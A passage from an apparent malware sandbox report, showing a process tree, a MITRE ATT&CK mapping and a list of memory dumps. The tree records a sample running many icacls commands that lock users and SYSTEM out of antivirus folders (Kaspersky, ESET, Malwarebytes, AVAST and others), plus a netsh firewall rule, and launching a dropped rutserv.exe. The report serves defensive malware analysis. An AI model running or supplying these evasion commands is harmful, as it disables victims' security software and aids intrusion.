  2⤵
  PID:3520
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:852
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:2076
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:888
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3256
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3284
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:2824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:1160
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:736
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:1820
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1580
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3304
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:612
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:1384
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:2180
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:852
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:2044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  PID:1732
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:1000
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:2148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:936
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:3636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:868
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3376
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1776
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1460
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1724
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1420
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3256
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:3052
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:788
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3976
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3592
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1836
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1000
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:936
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2692
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1052
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:360
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1192
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3256
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1072
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:788
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:2128
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3304
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:968
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:504
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:3988
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3764
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1776
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2084
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2208
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1360
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:804
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1072
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2168
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3612
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2892
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:356
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1460
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:680
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3256
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3052

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3152

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:3988

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/680-139-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/680-140-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/680-148-0x0000000000AC0000-0x0000000000B6E000-memory.dmp

Filesize
696KB

Download
memory/1292-230-0x0000029CD6F30000-0x0000029CD6F44000-memory.dmp

Filesize
80KB

Download
memory/1292-232-0x0000029CD8820000-0x0000029CD8840000-memory.dmp

Filesize
128KB

Download
memory/1292-231-0x0000029CD8800000-0x0000029CD8820000-memory.dmp

Filesize
128KB

Download
memory/1316-147-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1316-149-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1316-152-0x0000000000B10000-0x0000000000B11000-memory.dmp

Filesize
4KB

Download
memory/2020-155-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/2020-156-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/2020-159-0x0000000000C20000-0x0000000000C21000-memory.dmp

Filesize
4KB

Download
memory/3152-163-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3152-171-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3152-162-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download